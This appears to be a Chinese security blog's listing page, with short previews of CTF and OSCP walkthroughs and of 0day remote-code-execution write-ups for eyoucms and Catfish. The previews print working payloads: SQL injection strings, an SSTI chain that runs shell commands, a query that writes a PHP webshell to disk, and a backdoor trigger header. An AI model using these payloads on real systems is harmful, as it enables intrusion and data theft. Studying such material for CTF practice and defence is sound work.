- 博客(121)
- 收藏
- 关注
RSS订阅
原创 eyoucms 1.5.5任意命令执行漏洞(0day)
eyoucms 1.5.5任意命令执行漏洞文章目录eyoucms 1.5.5任意命令执行漏洞一、漏洞简介二、漏洞影响三、复现过程漏洞位置漏洞分析漏洞利用一、漏洞简介eyoucms1.5.5后台存在任意命令执行漏洞。二、漏洞影响eyoucms1.5.5三、复现过程漏洞位置application\admin\logic\FilemanagerLogic.php editFile函数。漏洞分析当我们在模板管理功能的页面中传入php代码时会被解析。但是存在过滤,过滤如下:$content =
2021-12-30 14:07:04
8106
3
原创 Catfish任意代码执行漏洞 0day
Catfish任意代码执行漏洞漏洞影响Catfish6.3.0(最新版)复现过程漏洞位置:application\install\controller\Index.php step3()在该函数中会将我们传入的内容替换database.php中的数据我们来看下该文件这么一看会发现很简单,是不是只要post 传入prefix=','a'=>exec('calc')]?>之类的的就可以成功写入里面呢,但是经过断点跟踪发下存在一些问题。在此之前会进行一个查询,如果我们传pref
2021-12-28 16:24:35
594
原创 ciscn国赛初赛web(4道低分题)
文章目录easy_sqleasy_sourcemiddle_sourceuploadeasy_sql经过简单尝试发现为单引号括号闭合,并且可用使用报错注入注出库名uname=1')||extractvalue('abc',concat('~',database()))%23&passwd=1接着尝试利用information_schema库注表名,但是发现information被过滤掉了那么可用无列名注入获取到第一个列名iduname=1') ||updatexml("~",co
2021-05-16 12:36:58
7153
22
原创 2021虎符杯web(部分)
签到根据提示直接在网上搜新闻。这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。也就是说zerodiumsystem将会有system函数的功能。payload:unsetme在网站上下载下来源码,修改index.php后本地搭建。开启报错后爆出关键内容找到代码位置其中$key为我们传入的a的内容
2021-04-04 15:52:57
2277
原创 CTFSHOW SSTI篇
文章目录web361web362web363web364web365web366、367web368web369web370web371web372建议大家先看下笔者之前写的模板注入的文章web361payloadname={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}web362payload?name={{x.__init__.__glo
2021-01-08 11:03:21
5897
13
原创 SSTI模板注入绕过(进阶篇)
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性下面的内容均以jinja2为例,根据官方文档来探寻绕过方法文档链接默认大家都已经可以利用没有任何过滤的模板注入语法官方文档对于模板的语法介绍如下{% ... %} for Statements {{ ... }} for Expressions to print to the template output{# ... #} for Comments not included in the templat
2020-12-11 17:40:19
18597
8
原创 无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
题目例子<?phperror_reporting(0);highlight_file(__FILE__);$code=$_GET['code'];if(preg_match('/[a-z0-9]/i',$code)){ die('hacker');}eval($code);我们下面以命令system('ls')为例一、异或<?php/*author yu22x*/$myfile = fopen("xor_rce.txt", "w");$contents="
2020-10-18 14:03:52
15347
14
原创 Challenge 6 - OSCP C
开放了161端口,直接snmpbulkwalk扫描得到账号密码试了那几个web端口,发现可以登录8083的vesta,但是需要用户名大写Jack接着登录之后里面可以创建计划任务,直接弄个反弹shell,一分钟回弹。得到shell后,运行linpeas.sh提供了几个可能的漏洞,挨个试一下。
2024-03-14 13:49:04
740
原创 Challenge 5 - OSCP B
jdwp可以执行命令,但是这个脚本需要python2来运行,靶机上没有,那么我们只能将8000端口代理出来了,我这里代理到我本地的7800端口上。访问8080端口显 hostname,我们通过nmap可以看到hostname为ms01.oscp.exam,修改/etc/hosts。试了下impacket-smbexec没有成功, 不过他开放了22端口,我们可以ssh登录web_svc用户。得到下面的结果,root用户运行了一个貌似是debug的进程。nmap扫描发现了一个可以的端口8021。
2024-03-14 13:48:40
650
原创 Challenge 4 - OSCP A
在c盘下发现一个windows.old,在里面可以找到SYSTEM和SAM文件,下载到本地,利用samdump2解密发现没解出来,再来试试pwdump.py(https://github.com/CiscoCXSecurity/creddump7)得到压缩包密码bludecode,解压之后发现一个比较特殊的文件configuration.php,里面有两个类似密码的字符串。登录之后在/opt/backups/下发现几个特殊文件,其中sitebackup3.zip是个正常的压缩包。但是这个压缩包是有密码的。
2024-03-14 13:48:15
1012
原创 OSCP-Challenge 2 - Relia
使用andrea:PasswordPassword_6登录远程桌面,在c盘根目录下发现一个计划任务的ps,文件,修改执行的exe位木马,获取到milana用户的反弹shell。,发现开放了一个8000端口,但是我们外部是访问不到的,它对应的页面是/var/www/internal/,这个目录下的文件我们是可以访问的,把这个文件打个包放到本地分析下。其中数据的可以直接连接mssql,但是端口是49965,不过在数据库中没发现什么可用的信息,但是可以修改密码直接进后台,这个可以先放放。
2024-03-14 13:47:41
1459
2
原创 OSCP-Challenge 1 - Medtech
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
2024-03-14 12:57:07
2544
6
原创 hack the box—Lame
这里还开个21,并且可以知道版本号,直接搜索ftp漏洞。还是老方法nmap+fscan得到开放的端口和服务。看到开了445,先来波ms17-010,发现失败。那么在回过头来看看445端口的samba。设置好参数进行攻击即可得到flag。设置好参数后进行攻击,还是失败了。版本是3.0.20,再来搜搜。msf正好有对应的模块。
2023-07-25 19:05:46
534
原创 hackthebox—Sau
访问55555端口是个Request Baskets,这个存在一个ssrf漏洞,可以用现成的脚本来实现。fscan扫描ip发现存在22和55555,但是实际上这个fscan扫描的不全。不过这 靶机有点奇怪,直接反弹shell不行,但是可以写个sh,然后去执行sh。可以看到这个80页面是用Maltrail搭建的,那么直接搜下这个东西的漏洞。有三个端口,其中80应该是只能内网访问,看来需要借助ssrf了。在/home/puma下得到flag1,直接需要提权。点击这个设置,把要访问地址输上。
2023-07-25 17:12:19
762
1
原创 ctfshow web入门 内网渗透篇
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
2023-06-26 14:35:40
2257
2
原创 ctfshow终极考核web654
web654上传上去木马后进行udf提权参考文章so文件下载地址 提取码: pgns因为不好直接上传so文件,可以先将他在本地base64编码cat a.so |base64然后把输出的内容复制下来可能有换行需要给去掉echo "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA0AwAAAAAAABAAAAAAAAAAOgYAAAAAAAAAAAAAEAAOAAFAEAAGgAZAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBU
2022-08-01 16:39:05
907
原创 CTFSHOW SQL注入篇(171-190)
无过滤前言下面几道无过滤的题都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23"有的是查询的三项所以payload是id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23"接着
2022-06-07 14:00:24
2411
原创 CTFSHOW 套娃shell
CTFSHOW 套娃shell1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了):GET /?file=/a HTTP/1.1Host: 127.0.0.1Connection: close但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/。我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也
2022-04-29 21:00:00
2251
原创 2022网刃杯web
signin源码如下<?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch);?>很明显的ssrf漏洞。用dict协议探测了下3306、6379、9000端口。应该是都没
2022-04-25 09:03:53
1516
5
原创 CTFSHOW 常用姿势篇(811-820)
CTFSHOW 常用姿势篇群主在视频里面已经讲解的很清楚了,下面内容有些简略,就当补充下payload了。文章目录CTFSHOW 常用姿势篇web811web812web8111、搭建恶意ftp服务器import sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind(('0.0.0.0',4566)) #端口可改s.listen(1)conn, addr = s.accept()conn.send(b'220
2022-04-17 12:40:24
2000
原创 CTFSHOW 常用姿势篇(801-810)
CTFSHOW 常用姿势篇群主在视频里面已经讲解的很清楚了,下面内容有些简略,就当补充下payload了。文章目录CTFSHOW 常用姿势篇web801web802web803web804web805web806web807web808web809web809web801非预期解:直接读flag /file?filename=/flag预期解:计算PIN码新版的计算方式发生了一些变化probably_public_bits包含4个字段,分别为usernamemodnamegetattr
2022-04-08 14:07:05
3163
2
原创 2022红明谷杯web
Fan website题目给了提示,和laminas有关。扫描目录得到源码。审计代码发现题目有个album路由,并且控制器只有一个/module/Album/src/Controller/AlbumController.php里面包含几个处理函数,可以上传文件,删除文件。但是上传文件过滤是白名单所以不是很好绕过。并且内容里面不能有<? HALT_COMPILER这就有点此地无银三百两了,无缘无故为啥过滤和phar有关的HALT_COMPILER。上网搜这个组件的漏洞发现了一个反序
2022-03-24 14:50:51
1748
原创 CTFSHOW大赛原题篇(web756-web770)
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。文章目录web756web757web758web759web760web761web762web782web785web786web787web788web789web756code=GLOBALSweb757每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0)因为不是每一次md5都有可能字母开头,所以我们需要多测试几次,直接在给的key后面不断加字符就可以了。import reque
2022-03-04 13:42:58
1123
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人